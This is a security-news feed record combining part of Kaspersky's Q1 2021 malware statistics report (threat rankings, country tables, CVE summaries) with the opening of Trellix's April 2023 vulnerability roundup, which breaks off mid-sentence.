infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 30.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 \n3 | Trickster | Trojan.Win32.Trickster | 7.5 \n4 | Emotet | Backdoor.Win32.Emotet | 7.4 \n5 | RTM | Trojan-Banker.Win32.RTM | 6.6 \n6 | Nimnul | Virus.Win32.Nimnul | 5.1 \n7 | Nymaim | Trojan.Win32.Nymaim | 4.7 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 2.2 \n \n_** Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n**New additions to the ransomware arsenal**\n\nLast year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.\n\nREvil (aka Sodinokibi) is another group looking to increase its extortion leverage. In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.\n\n**Attacks on vulnerable Exchange servers**\n\n[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector was seen being used by the Black Kingdom and DearCry families.\n\n**Publication of keys**\n\nThe developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.\n\n**Law enforcement successes**\n\nLaw enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.\n\nFrench and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors. The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.\n\nIn South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).\n\n### Number of new modifications\n\nIn Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2020 \u2013 Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.31% \n2 | Ethiopia | 0.62% \n3 | Greece | 0.49% \n4 | Pakistan | 0.49% \n5 | China | 0.48% \n6 | Tunisia | 0.44% \n7 | Afghanistan | 0.42% \n8 | Indonesia | 0.38% \n9 | Taiwan, Province of China | 0.37% \n10 | Egypt | 0.28% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% \n5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% \n6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom\n\nVirus.Win32.PolyRansom | 3.78% \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% \n8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% \n9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% \n10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. And though January and February passed off relatively calmly, March saw a sharp rise in the number of new modifications \u2014 more than fourfold compared to February.\n\n_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year&#x27;s trend, whereby the number of users attacked by miners actually fell. For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.\n\n_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.65 \n2 | Ethiopia | 3.00 \n3 | Rwanda | 2.37 \n4 | Uzbekistan | 2.23 \n5 | Kazakhstan | 1.81 \n6 | Sri Lanka | 1.78 \n7 | Ukraine | 1.59 \n8 | Vietnam | 1.48 \n9 | Mozambique | 1.46 \n10 | Tanzania | 1.45 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nIn Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) \u2014 use-after-free vulnerabilities in Microsoft Excel \u2014 and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we&#x27;ve often written about, were also in demand. Note the age of these vulnerabilities \u2014 even the latest of them was discovered almost three years ago. So, once again, we remind you of the importance of regular updates.\n\nThe first quarter was rich not only in known exploits, but also new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>)\u2014 a service-side request forgery vulnerability that allows remote code execution (RCE)\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>)\u2014 an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>)\u2014 a post-authorization arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>)\u2014 as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authorized Microsoft Exchange user to write data to an arbitrary file in the system\n\nFound [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.\n\nDuring the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem. Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_\n\nThe second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there was no doing without newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt the heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:\n\n * [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>)\u2014 heap buffer overflow in the V8 script engine, leading to remote code execution\n * [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)\u2014 overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution\n * [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>)\u2014 bypassing security restrictions when using an iframe.\n\nOther interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights. Critical vulnerabilities in the popular SolarWinds Orion Platform \u2014 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) \u2014 caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.\n\nAnalysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-force passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).\n\n## Attacks on macOS\n\nQ1 2021 was also rich in macOS-related news. Center-stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS). In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 18.01 \n2 | AdWare.OSX.Pirrit.j | 12.69 \n3 | AdWare.OSX.Pirrit.o | 8.42 \n4 | AdWare.OSX.Bnodlero.at | 8.36 \n5 | Monitor.OSX.HistGrabber.b | 8.06 \n6 | AdWare.OSX.Pirrit.gen | 7.95 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 \n8 | AdWare.OSX.Cimpli.m | 6.17 \n9 | AdWare.OSX.Pirrit.aa | 6.05 \n10 | Backdoor.OSX.Agent.z | 5.27 \n11 | Trojan-Downloader.OSX.Agent.h | 5.09 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Ketin.h | 4.02 \n14 | AdWare.OSX.Bnodlero.bc | 3.87 \n15 | AdWare.OSX.Bnodlero.t | 3.84 \n16 | AdWare.OSX.Cimpli.l | 3.75 \n17 | Trojan-Downloader.OSX.Lador.a | 3.61 \n18 | AdWare.OSX.Cimpli.k | 3.48 \n19 | AdWare.OSX.Ketin.m | 2.98 \n20 | AdWare.OSX.Bnodlero.ay | 2.94 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nTraditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan&#x27;s task is to download adware from the Pirrit and Bnodlero families. But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.\n\n### Threat geography\n\n_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 4.62 \n2 | Spain | 4.43 \n3 | Italy | 4.36 \n4 | India | 4.11 \n5 | Canada | 3.59 \n6 | Mexico | 3.55 \n7 | Russia | 3.21 \n8 | Brazil | 3.18 \n9 | Great Britain | 2.96 \n10 | USA | 2.94 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000) \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol. A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.\n\nTelnet | 69.48% \n---|--- \nSSH | 30.52% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 77.81% \n---|--- \nSSH | 22.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | China | 33.40 \n2 | India | 13.65 \n3 | USA | 11.56 \n4 | Russia | 4.96 \n5 | Montenegro | 4.20 \n6 | Brazil | 4.19 \n7 | Taiwan, Province of China | 2.32 \n8 | Iran | 1.85 \n9 | Egypt | 1.84 \n10 | Vietnam | 1.73 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | USA | 24.09 \n2 | China | 19.89 \n3 | Hong Kong | 6.38 \n4 | South Korea | 4.37 \n5 | Germany | 4.06 \n6 | Brazil | 3.74 \n7 | Russia | 3.05 \n8 | Taiwan, Province of China | 2.80 \n9 | France | 2.59 \n10 | India | 2.36 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### Threats loaded into traps\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 50.50% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% \n3 | Backdoor.Linux.Gafgyt.a | 3.01% \n4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% \n5 | Backdoor.Linux.Mirai.a | 2.72% \n6 | Backdoor.Linux.Mirai.ba | 2.67% \n7 | Backdoor.Linux.Agent.bc | 2.37% \n8 | Trojan-Downloader.Shell.Agent.p | 1.37% \n9 | Backdoor.Linux.Gafgyt.bj | 0.78% \n10 | Trojan-Downloader.Linux.Mirai.d | 0.66% \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.\n\n_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 15.81 \n2 | Ukraine | 13.60 \n3 | Moldova | 13.16 \n4 | Kyrgyzstan | 11.78 \n5 | Latvia | 11.38 \n6 | Algeria | 11.16 \n7 | Russia | 11.11 \n8 | Mauritania | 11.08 \n9 | Kazakhstan | 10.62 \n10 | Tajikistan | 10.60 \n11 | Uzbekistan | 10.39 \n12 | Estonia | 10.20 \n13 | Armenia | 9.44 \n14 | Mongolia | 9.36 \n15 | France | 9.35 \n16 | Greece | 9.04 \n17 | Azerbaijan | 8.57 \n18 | Madagascar | 8.56 \n19 | Morocco | 8.55 \n20 | Lithuania | 8.53 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users&#x27; computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 47.71 \n2 | Turkmenistan | 43.39 \n3 | Ethiopia | 41.03 \n4 | Tajikistan | 38.96 \n5 | Bangladesh | 36.21 \n6 | Algeria | 35.49 \n7 | Myanmar | 35.16 \n8 | Uzbekistan | 34.95 \n9 | South Sudan | 34.17 \n10 | Benin | 34.08 \n11 | China | 33.34 \n12 | Iraq | 33.14 \n13 | Laos | 32.84 \n14 | Burkina Faso | 32.61 \n15 | Mali | 32.42 \n16 | Guinea | 32.40 \n17 | Yemen | 32.32 \n18 | Mauritania | 32.22 \n19 | Burundi | 31.68 \n20 | Sudan | 31.61 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_\n\nOverall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.", "cvss3": {}, "published": "2021-05-31T10:00:05", "type": "securelist", "title": "IT threat evolution Q1 2021. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:05", "id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "href": "https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2023-05-03T00:00:00", "description": "# The Bug Report \u2013 April 2023 Edition\n\nBy Trellix \u00b7 May 03, 2023 \nThis story was also written by John Rodriguez.\n\n It\u2019s never easy coming back. \n\n\n## Why am I here?\n\nSeems as if some of us should have stayed at our tropical vacation getaway. Nothing like coming back to the cyber world screeching about intelligence leaks, critical vulnerabilities, and breaches. It\u2019s as if we should be asking \u201cwho has not been breached these days?\u201d 3CX made the news early in April via a supply chain attack, Uber\u2019s driver data was stolen via the breach on Genova Burns LLC and now MSI has been compromised. Fear not! It\u2019s not all doom and gloom, as the Trellix Advanced Research Center helped take down one of the largest online markets for illegal activities and content.\n\nOrganizations looking to avoid having their names wind up in similar headlines have come to the right place, as the Bug Report promises to the answer the questions, \u201cWhat is it?\u201d \u201cWho cares?\u201d and \u201cWhat can I do?\u201d for the top vulnerabilities each month. As promised, let\u2019s say hello to this month\u2019s list of faulty bugs! \n\n * CVE-2023-28205: macOS, iOS, iPadOS, and Safari\n * CVE-2023-29389: 2021 Toyota RAV4\n * CVE-2023-28252: Windows Common Log File System (CLFS)\n * CVE-2023-2033: Google Chrome and Chromium\n\n## CVE-2023-28205: One bite of the Apple\n\n### What is it?\n\nLooks like Google\u2019s Cl\u00e9ment Lecigne is [on](<https://nvd.nist.gov/vuln/detail/CVE-2021-1879>) [a](<https://nvd.nist.gov/vuln/detail/cve-2022-42856>) [roll](<https://nvd.nist.gov/vuln/detail/CVE-2023-28205>) with Apple-related CVEs, this being his third major find in just two years. This vulnerability is a use-after-free in Webkit, a browser engine used in Safari, iOS, iPadOS, and macOS to render online content. The vuln can be triggered via a malicious HTML page embedded with a JavaScript payload, leading to arbitrary code execution with elevated privileges.\n\n### Who cares?\n\nA wide range of devices running iOS, iPadOS, Safari, and macOS are vulnerable, placing the majority of Apple\u2019s customers firmly in the \u201cI care\u201d column. You may be surprised to learn that the iPod Touch was among the vulnerable products that have been patched. Frankly, I had to research if iPods are still even a thing\u2014I must be getting old. \n\n I am old. \n\n\nIt should also be noted that the researchers who reported this bug to Apple apparently [discovered it being used in the wild](<https://twitter.com/DonnchaC/status/1644414669254271006>), although neither they nor Apple have released any details regarding the nature of this exploitation as of yet. \n\n### What can I do?\n\nThankfully, Apple has already patched this vulnerability with the release of versions [15.7.5](<https://support.apple.com/en-us/HT213723>) and [16.4.1](<https://support.apple.com/en-us/HT213720>) for iOS, iPadOS, and Safari and the release of [macOS Ventura 13.3.1.](<https://support.apple.com/en-us/HT213721>) If you\u2019ve somehow survived this long without knowing how to update your Apple devices, Apple provides support pages on how to accomplish this for both [mobile](<https://support.apple.com/en-us/HT204204>) and [desktop](<https://support.apple.com/en-us/HT201541>). \n\n## CVE-2023-29389: 2021 Toyota RAV4, now with keyless entry \n\n### What is it?\n\nAt the risk of sounding entitled, would it be possible for Toyota to ensure their vehicles _don\u2019t_ automatically trust messages from other ECUs via the CAN bus? Unfortunately, I don\u2019t think the folks at Toyota can hear my request, since it\u2019s still possible to use this type of attack on any 2021 Toyota RAV4 (and potentially other vehicles\u2014see below). Simply access the headlight connector behind the bumper and send a [\"Key is validated\"](<https://vulners.com/cve/CVE-2023-29389>) message via CAN injection, and now you can control the vehicle.\n\n This isn\u2019t what I had in mind when the salesperson told me it had \u201ckeyless entry.\u201d \n\n\nKen Tindell, CTO of Canis Automotive Labs, and his friend Ian Tabor discovered this vulnerability after Ian\u2019s RAV4 was [stolen off the street](<https://twitter.com/mintynet/status/1549955820166778881>) back in July of last year after a couple of failed attempts in April, meaning criminals have been using this vulnerability for at least a year. In [his blog](<https://kentindell.github.io/2023/04/03/can-injection/>), Ken notes that although the CVE description explicitly names the 2021 Toyota RAV4 as the vulnerable product, \u201cthis is not something specific to Toyota: Ian investigated the RAV4 because his stolen car was a RAV4, and other manufacturers have car models that can be stolen in a similar way.\u201d In fact, the theft device they reverse-engineered to discover the vulnerability claims to support \u201cLexus models including the ES, LC, LS, NX, RX and Toyota models including the GR Supra, Prius, Highlander, Land Cruiser - and RAV4.\u201d\n\n### Who cares?\n\nIn 2021, Toyota sold [407,739](<https://www.goodcarbadcar.net/toyota-rav4-sales-figures/>) RAV4\u2019s in the U.S alone. While it may not be assumed that all of those were 2021 models given how car release cycles are implemented, it is still a significant number of vehicles that may be vulnerable to CAN injection hijacking. If Ken Tindell\u2019s claim that this vulnerability affects various other Lexus and Toyota models is to be believed, it\u2019s possible this number could be in the millions. A threat actor compromising a vehicle via this method could endanger the public or the driver\u2019s life\u2014or, more likely, use it to unlock and [steal the car right off the street in minutes.](<https://arstechnica.com/information-technology/2023/04/crooks-are-stealing-cars-using-previously-unknown-keyless-can-injection-attacks/>)\n\n### What can I do?\n\nCurrently there is no patch available from Toyota. So\u2026 secure your vehicle? Have it insured? Forgo electronic vehicles entirely? Jokes aside, without a patch from Toyota, your best bet is probably to avoid leaving your RAV4 on the street at night and park in the garage for the time being. If you need to park on the street, utilize a steering wheel lock to make your vehicle a less attractive target for carjackers.\n\n## CVE-2023-28252: Gang Gang CLFS\n\n### What is it?\n\nNothing like jumping into another [zero-day](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28252>) found in the Windows driver for its [Common Log File System (CLFS)](<https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/introduction-to-the-common-log-file-system>), which seems to be a common target for vulnerabilities as of late. For those that don\u2019t know, CLFS is a subsystem utilized by both the kernel and user space applications to, among other things, log [transactions](<https://en.wikipedia.org/wiki/Database_transaction>) to the disk in the form of a Base Log File.\n\nCVE-2023-28252 can be exploited by malforming the Base Log File\u2019s fields enough to cause an out-of-bounds write when the driver processes it. Once the vulnerability is triggered, the attacker may use the exposed kernel structures to execute malicious code with system privileges.\n\n### Who cares?\n\nDo you run Windows in enterprise environments? Maybe even just at home? If you own one of the [billions of devices](<https://news.microsoft.com/bythenumbers/en/windowsdevices>) worldwide that run Windows, congratulations, you are vulnerable! \n\nTo be fair, the 